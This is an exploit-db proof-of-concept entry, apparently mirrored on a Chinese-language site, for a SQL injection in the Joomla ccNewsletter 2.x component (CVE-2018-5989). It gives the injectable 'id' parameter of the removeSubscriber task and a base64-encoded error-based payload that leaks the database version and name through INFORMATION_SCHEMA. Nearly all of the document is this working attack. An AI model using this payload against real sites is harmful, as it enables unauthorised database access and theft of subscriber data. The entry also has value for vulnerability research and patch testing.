Joomla! Component ccNewsletter 2.x.x ‘id’ – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2018-02-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44132/
  • # # # #
    # Exploit Title: Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
    # Dork: N/A
    # Date: 16.02.2018
    # Vendor Homepage: https://www.chillcreations.com/
    # Software Link: https://extensions.joomla.org/extension/ccnewsletter/
    # Version: 2.x Stable
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: CVE-2018-5989
    # # # #
    # Exploit Author: Ihsan Sencan
    # # # #
    # 
    # POC:
    # 
    # 1)
    # http://localhost/[PATH]/index.php?option=com_ccnewsletter&task=removeSubscriber&id=[SQL]
    #
    # Y2ZjZDIwODQ5NWQ1NjVlZjY2ZTdkZmY5Zjk4NzY0ZGEnJTIwT1IlMjAoU0VMRUNUJTIwMiUyMEZST00oU0VMRUNUJTIwQ09VTlQoKiksQ09OQ0FUKHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpLEZMT09SKFJBTkQoMCkqMikpeCUyMEZST00lMjBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyUyMEdST1VQJTIwQlklMjB4KWEpLS0lMjBhTXBM
    # 
    # # # #